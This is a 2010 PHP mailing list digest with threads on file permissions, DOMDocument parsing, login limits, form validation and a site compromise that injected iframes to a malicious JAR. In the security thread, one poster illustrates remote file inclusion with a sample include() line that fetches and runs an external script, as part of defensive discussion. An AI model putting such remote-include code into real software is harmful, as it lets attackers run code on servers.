php-general Digest 7 Jun 2010 09:45:48 -0000 Issue 6785
php-general Digest 7 Jun 2010 09:45:48 - Issue 6785 Topics (messages 305858 through 305873): Re: unlink()? 305858 by: Ashley Sheridan 305860 by: tedd DOMDocument throws Unexpected end tag error when loading valid HTML 305859 by: Raymond Irving 305873 by: Richard Quadling image thumbnail from blob data 305861 by: saeed ahmed 305862 by: Ashley Sheridan 305863 by: Karl DeSaulniers 305864 by: Paul M Foster 305865 by: Phpster 305871 by: Adam Richardson Limiting logins 305866 by: Skip Evans 305867 by: Ashley Sheridan 305868 by: Paul M Foster 305870 by: Skip Evans DOMDocument::loadXML() failed when parsing comments inside a script tag 305869 by: Raymond Irving 305872 by: Adam Richardson Administrivia: To subscribe to the digest, e-mail: php-general-digest-subscr...@lists.php.net To unsubscribe from the digest, e-mail: php-general-digest-unsubscr...@lists.php.net To post to the list, e-mail: php-gene...@lists.php.net -- ---BeginMessage--- On Sun, 2010-06-06 at 14:08 -0400, tedd wrote: At 1:02 AM +0100 6/6/10, Ashley Sheridan wrote: On Sat, 2010-06-05 at 18:55 -0400, tedd wrote: Hi gang: Never-mind. I didn't change the parent directory permissions to unlink the file -- duh! tedd I was just about to mention this! It's one of the bizarre security loopholes in Linux. If you have write permissions to a directory but not a file within it, you can still delete the file. I believe you can change this behaviour with filesystem security mods, but I've not tried that. Ash Yes, I've seen where you can delete files within a directory by changing the directory permissions. It's not often that my scripts create/delete files on the server -- so I'm not up on it as much as I probably should be. However to me, it seems overly cautious to require scripts -- that are already running on the server -- to have the authority (ftp id and password) to create/delete files. After all, the scripts would not be there if the person who placed them there didn't have authority to create and delete files. So, I have to wonder under what scenario would evil scripts be found/run on the server? For example, if anyone was going to create an evil script and place it on the server, they must have the authority to do that. And if they had that authority, then they could just as easily add that to their script and side-step this requirement, right? So, what's the purpose? Cheers, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com I think it's more likely that a security flaw might be found which allows code other than yours to run. Buffer overflows were notorious for this, as they had the side-effect of running whatever ran outside of their buffer range, so you could in effect get a system with an overflow hole to run whatever code you wanted. Usually a problem like this would be limited to a specific function, but if someone was able to guess correctly that you were using this function then they could potentially form code that exploited it. I'm not an expert on this sort of thing, so what I've just said is how I roughly understand one aspect of the problem. Thanks, Ash http://www.ashleysheridan.co.uk ---End Message--- ---BeginMessage--- I think it's more likely that a security flaw might be found which allows code other than yours to run. Buffer overflows were notorious for this, as they had the side-effect of running whatever ran outside of their buffer range, so you could in effect get a system with an overflow hole to run whatever code you wanted. Usually a problem like this would be limited to a specific function, but if someone was able to guess correctly that you were using this function then they could potentially form code that exploited it. I'm not an expert on this sort of thing, so what I've just said is how I roughly understand one aspect of the problem. Thanks, Ash Ash: Good enough. Thanks, tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com ---End Message--- ---BeginMessage--- Hello, Sorry to have to be writing to you directly. I've tried sending this email to the mailing list but it keeps returning with a failure message: Remote host said: 550 5.7.1 reject mailfrom [sbl] It appears that my yahoo about has been black listed? Anyway, I'm hoping you can help me with the following issue: I'm getting a php warning from DOMDocument after running a test script that tried to load some html inside the DOM and then echo the html to the browser: Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag : strong in Entity, line: 8 in C:\www\dom-test.php on line 23 The problem is that DOMDocument::loadHTML() attempts to
Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML
On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote: Hello, Sorry to have to be writing to you directly. I've tried sending this email to the mailing list but it keeps returning with a failure message: Remote host said: 550 5.7.1 reject mailfrom [sbl] It appears that my yahoo about has been black listed? Anyway, I'm hoping you can help me with the following issue: I'm getting a php warning from DOMDocument after running a test script that tried to load some html inside the DOM and then echo the html to the browser: Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag : strong in Entity, line: 8 in C:\www\dom-test.php on line 23 The problem is that DOMDocument::loadHTML() attempts to remove the '/strong' tag from within a JavaScript string variable inside the script tag. If I try to wrap !-- -- around the content of the script tag it will still throw the error. I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It appears to work just fine in version 5.2.0 but the other version throw the above error. Here's the script. Can anyone confirm this error or is there a known workaround? ?php $html = ' !DOCTYPE html html head meta http-equiv=Content-Type content=text/html; charset=UTF-8/ script type=text/javascript var html = strongBold Text/strong,Normal Text; document.write(html); alert(html); /script /head body /body /html '; $dom = new DOMDocument(); $dom-loadHTML($html); echo $dom-saveHTML(); ? Best regards __ Raymond Irving Should the HTML be wrapped ... ![CDATA[ htmltagsouphere/soup/tag/html ]] ? -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML
On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote: Hello, Sorry to have to be writing to you directly. I've tried sending this email to the mailing list but it keeps returning with a failure message: Remote host said: 550 5.7.1 reject mailfrom [sbl] It appears that my yahoo about has been black listed? Anyway, I'm hoping you can help me with the following issue: I'm getting a php warning from DOMDocument after running a test script that tried to load some html inside the DOM and then echo the html to the browser: Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag : strong in Entity, line: 8 in C:\www\dom-test.php on line 23 The problem is that DOMDocument::loadHTML() attempts to remove the '/strong' tag from within a JavaScript string variable inside the script tag. If I try to wrap !-- -- around the content of the script tag it will still throw the error. I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It appears to work just fine in version 5.2.0 but the other version throw the above error. Here's the script. Can anyone confirm this error or is there a known workaround? ?php $html = ' !DOCTYPE html html head meta http-equiv=Content-Type content=text/html; charset=UTF-8/ script type=text/javascript var html = strongBold Text/strong,Normal Text; document.write(html); alert(html); /script /head body /body /html '; $dom = new DOMDocument(); $dom-loadHTML($html); echo $dom-saveHTML(); ? Best regards __ Raymond Irving Or should the html that is inside the JS be urlencoded? lt;stronggt; ? -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Limiting logins
On 7 June 2010 04:20, Skip Evans s...@bigskypenguin.com wrote: Hey Ash all, Thanks for that detailed explanation. This is a lot of what I was thinking. Cookies can get deleted, etc, and all the other things that can toss wrenches into this. To clarify, they want to limit a single user to two machines max, but only one at a time. I'm going to have to explain to them the problems with this and see what else they can work out. The manual unlock Ash suggests is interesting, and I'll run that by them, but I'm thinking they might opt to forgo the limit for now to avoid risking pissing off new customers with something that might be more of a hassles for them than it's worth. Thanks much for your input. This is a lot of good stuff to help me articulate a response to the client. Skip Ashley Sheridan wrote: On Sun, 2010-06-06 at 20:31 -0500, Skip Evans wrote: Hey all, I'm familiar with setting cookies in PHP and using REMOTE_ADDR to get a visitor's IP address (or that of their gateway), but not quite sure how to implement a robust mechanism that would limit a user to logging in from only two different machines, a requirement this client has on the project. I'd greatly appreciate hearing from people who have done this or something similar, or suggestions people might have that would give that oh so familiar, D'oh! moment. I have some ideas sketched out, setting cookies, etc, but not sure how robust they'd be. Big Thanks! Skip -- Skip Evans PenguinSites.com, LLC 503 S Baldwin St, #1 Madison WI 53703 608.250.2720 http://penguinsites.com Those of you who believe in telekinesis, raise my hand. -- Kurt Vonnegut Is this two machines at the same time, or two machines ever? I don't think there's any way you can guarantee either, unless you supply them with some form of closed binary that they are forced to use either instead of or with the browser, i.e. a Java applet, etc. A similar question to this came up on the list not so long ago, and there was no real conclusion at the end other than it can't really be done. Cookies can be deleted, IP addresses change all the time (either deliberately, by some proxy or even by the ISP itself issuing a dynamic IP address), even the MAC address (if you found a way to get at it) can change. About the only thing I've seen that might help was a device made for the Bloomberg stock market system, which was a small credit-card sized object which would read in a random pattern of flashes from the screen and produce a unique ID number which was then keyed back into the system. By relying on a physical dongle you can pretty much guarantee that a user is only on one system, but the project obviously becomes much more costly and complicated. If you do go the cookie route, maybe gather a bunch of information to store on the server against that cookie and the user. If the cookie is not detected the next time the user goes to log in, maybe force them to send an email requiring a manual unlock, and make them give a reason for either why the cookie was removed, or why the computer information has changed beyond the two computer profiles you've got stored for them. It's not foolproof, but might show your client why this isn't something that can be easily done, and is not something that should be decided on lightly, as there are many valid and genuine reasons why somebody might want to use more than two computers (i.e. they had a fire and lost those computers, they rebuilt a computer with a new OS, they upgraded the computer, a computer was stolen and needed to be replaced, they are away from their computer and had to use a public access one, etc. The list can go on and on.) Thanks, Ash http://www.ashleysheridan.co.uk -- Skip Evans PenguinSites.com, LLC 503 S Baldwin St, #1 Madison WI 53703 608.250.2720 http://penguinsites.com Those of you who believe in telekinesis, raise my hand. -- Kurt Vonnegut -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php For dealing with multiple simultaneous logins, the easiest option is the store the session ID against the user account on the DB and compare this for each of the secured resources. Make sure that any login page doesn't automatically login as you could end up in a mad race as the 2 sessions compete to login and are constantly throwing the other session out. Richard. -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling -- PHP General Mailing List (http://www.php.net/) To unsubscribe,
[PHP] Security Issue
Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter)
Re: [PHP] Security Issue
On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) OK, first thing, check all the file access logs, i.e. FTP logs, etc, just to make sure that it's not a case of a compromised password. There's a well-known issue with people who use FileZilla on Windows systems that allows passwords to be easily stolen. Next, see if you can isolate the IP address(s) that might be making these changes, and then go back over the HTTP access logs to determine what URLs they are visiting on the site. This should give you an idea about where the attack is coming in from. Make sure that any pre-built systems (i.e. shopping carts, blog or forum software) is patched and up-to-date. A lot of attacks are targeted at sites en-mass because they are found to have the same flaw which, left unpatched, is like an open door to your server. It's also not a bad idea to change the passwords used to access the server, both for FTP and SSH. You might also need to scan the server with antivirus software (this is mainly for Windows servers really) to make sure that a rootkit hasn't been installed. Thanks, Ash http://www.ashleysheridan.co.uk
[PHP] Re: DOMDocument throws Unexpected end tag error when loading valid HTML
On Sun, 6 Jun 2010 13:56:25 -0500, Raymond Irving wrote: Here's the script. Can anyone confirm this error or is there a known workaround? ?php $html = ' !DOCTYPE html html head meta http-equiv=Content-Type content=text/html; charset=UTF-8/ script type=text/javascript var html = strongBold Text/strong,Normal Text; document.write(html); alert(html); /script /head body /body /html '; In HTML, the / sequence closes the script element. You can escape the / character with a backslash: strongBold Text\/strong,Normal Text /Nisse -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype htmlspecialchars() is really only good for user input that you are outputting to the browser. For inserting data into a database, use mysql_real_escape_string(). I find it's good to think carefully about what sort of data I expect and sanitise it accordingly. If I want a numerical value, I use intval($_GET['var']) or floatval(). For things like small text box elements, regex's work well depending on the data. For data from select lists of checkboxes, make sure the value given is within a list of pre-determined values you have. Basically, nothing from the user should be trusted at all, ever. As soon as you let go of that trust in the good honesty of people you'll do fine ;) Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
Oh yeah. I do more than just intval() I make sure they didn't feed me anything BUT numeric text first. I do sanity check before type forcing :) I use garbage in garbage out. So I take what is given to me and yes I escape if before the db of course as well, and then encode on output. On Jun 7, 2010, at 10:45 AM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype htmlspecialchars() is really only good for user input that you are outputting to the browser. For inserting data into a database, use mysql_real_escape_string(). I find it's good to think carefully about what sort of data I expect and sanitise it accordingly. If I want a numerical value, I use intval($_GET['var']) or floatval(). For things like small text box elements, regex's work well depending on the data. For data from select lists of checkboxes, make sure the value given is within a list of pre-determined values you have. Basically, nothing from the user should be trusted at all, ever. As soon as you let go of that trust in the good honesty of people you'll do fine ;) Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote: It's not a SQL Injection or XSS problem, Michael. It's a PHP Injection problem. I know how fix that but the web site is very very huge, have lots and lots of partners and i'm have a bug difficult do identify the focus of the problem. Got it? Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php What do you mean it's a PHP injection? PHP is all on the server, and the only way to get at that if you don't have direct access to the server (which you've said isn't possible as the passwords, etc are all fine) then the bad data is coming from either a form or another area where user data is expected. This data might be as simple as unsanitised URL variables that are intended to fetch a blog entry, to form data sent in a registration page. All data coming from the user is bad until proven otherwise. Thanks, Ash http://www.ashleysheridan.co.uk
[PHP] combo box validation
Hello, I've got a form with two combo boxes, one for the month one for the day. Both are required. I've got code that checks the post submission to ensure neither is empty. My problem is that if a user does not select anything in the combo boxes January first is sent, this i don't want. If they haven't selected anything i'd like that to show as an error. Thanks. Dave. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote: Oh yeah. I do more than just intval() I make sure they didn't feed me anything BUT numeric text first. I do sanity check before type forcing :) I use garbage in garbage out. So I take what is given to me and yes I escape if before the db of course as well, and then encode on output. On Jun 7, 2010, at 10:45 AM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype htmlspecialchars() is really only good for user input that you are outputting to the browser. For inserting data into a database, use mysql_real_escape_string(). I find it's good to think carefully about what sort of data I expect and sanitise it accordingly. If I want a numerical value, I use intval($_GET['var']) or floatval(). For things like small text box elements, regex's work well depending on the data. For data from select lists of checkboxes, make sure the value given is within a list of pre-determined values you have. Basically, nothing from the user should be trusted at all, ever. As soon as you let go of that trust in the good honesty of people you'll do fine ;) Thanks, Ash http://www.ashleysheridan.co.uk Why waste time validating an integer value when intval() will do that for you? Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
I think we're getting off topic here folks... Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan a...@ashleysheridan.co.ukwrote: On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote: Oh yeah. I do more than just intval() I make sure they didn't feed me anything BUT numeric text first. I do sanity check before type forcing :) I use garbage in garbage out. So I take what is given to me and yes I escape if before the db of course as well, and then encode on output. On Jun 7, 2010, at 10:45 AM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype htmlspecialchars() is really only good for user input that you are outputting to the browser. For inserting data into a database, use mysql_real_escape_string(). I find it's good to think carefully about what sort of data I expect and sanitise it accordingly. If I want a numerical value, I use intval($_GET['var']) or floatval(). For things like small text box elements, regex's work well depending on the data. For data from select lists of checkboxes, make sure the value given is within a list of pre-determined values you have. Basically, nothing from the user should be trusted at all, ever. As soon as you let go of that trust in the good honesty of people you'll do fine ;) Thanks, Ash http://www.ashleysheridan.co.uk Why waste time validating an integer value when intval() will do that for you? Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
You could do generic things to modify the $_GET and other superglobal arrays. For example if you wanted to implement magic quote yourself have a recursive function (I'd paste one but I'm on my phone) but something akin to this: $_GET = your_function_name($_GET); An idea for you might be to look for / or .. and reject or sanitize that in some fashion. Really hard to speak on what would safely work across the website globally (you could also just modify those specific array indexes of $_GET that have filenames or something the cache uses) Hope that makes sense. iPhones aren't the easiest to explain (or bottom post) On Jun 7, 2010, at 10:42 AM, Igor Escobar titiolin...@gmail.com wrote: It's not a SQL Injection or XSS problem, Michael. It's a PHP Injection problem. I know how fix that but the web site is very very huge, have lots and lots of partners and i'm have a bug difficult do identify the focus of the problem. Got it? Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] combo box validation
On Mon, 2010-06-07 at 13:49 -0400, David Mehler wrote: Hello, I've got a form with two combo boxes, one for the month one for the day. Both are required. I've got code that checks the post submission to ensure neither is empty. My problem is that if a user does not select anything in the combo boxes January first is sent, this i don't want. If they haven't selected anything i'd like that to show as an error. Thanks. Dave. Make the first item in the select list something like this: option value=0 selected=selected-- select month --/option Then just check for the 0 value in PHP when the form is submitted. Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
Because that only typecasts it. It's safe but it isn't what the user actually entered. This way I can actually determine if the user put in 123abc and reject it, not accept it and keep the 123 silently for example. Same with floats. You may or may not consider a negative number acceptable, or with ints and floats 0 might not be acceptable too. So it's some analysis before intval/floatval/etc. I want to return to the user with a rejection notice so they literally get what they gave me (assuming it passes the sanity check) - it's not just simple silently typecasting and giving them something they didn't give me. And I meant to say garbage in, garbage out* * properly encoded or sanitized of course :) On Jun 7, 2010, at 10:51 AM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: Why waste time validating an integer value when intval() will do that for you? Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..
I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan
a...@ashleysheridan.co.ukwrote:
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
It's not a SQL Injection or XSS problem, Michael.
It's a PHP Injection problem. I know how fix that but the web site is
very
very huge, have lots and lots of partners and i'm have a bug difficult do
identify the focus of the problem.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com
wrote:
It's not that bad.
Use filter functions and sanity checks for input.
Use htmlspecialchars() basically on output.
That should take care of basically everything.
On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
wrote:
This was my fear.
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com
wrote:
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
Hi Folks!
The portal for which I work is suffering constant attacks that I
feel
that
is PHP Injection. Somehow the hacker is getting to change the cache
files
that our system generates. Concatenating the HTML file with another
that
have an iframe to a malicious JAR file. Do you have any suggestions
to
prevent this action? The hacker has no access to our file system, he
is
imputing the code through some security hole. The problem is that
the
portal
is very big and has lots and lots partners hosted on our estructure
structure. We are failing to identify the focus of this attacks.
Any ideas?
Check all user input + upload: make sure that whatever comes from the
user is validated. Then check all output: make sure that everythin
output is escaped properly. Yes, it's an enormous task, but there's
no
way around it.
Regards
Peter
--
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
What do you mean it's a PHP injection? PHP is all on the server, and the
only way to get at that if you don't have direct access to the server
(which you've said isn't possible as the passwords, etc are all fine)
then the bad data is coming from either a form or another area where
user data is expected. This data might be as simple as unsanitised URL
variables that are intended to fetch a blog entry, to form data sent in
a registration page.
All data coming from the user is bad until proven otherwise.
Thanks,
Ash
http://www.ashleysheridan.co.uk
[PHP] Test [don't read]
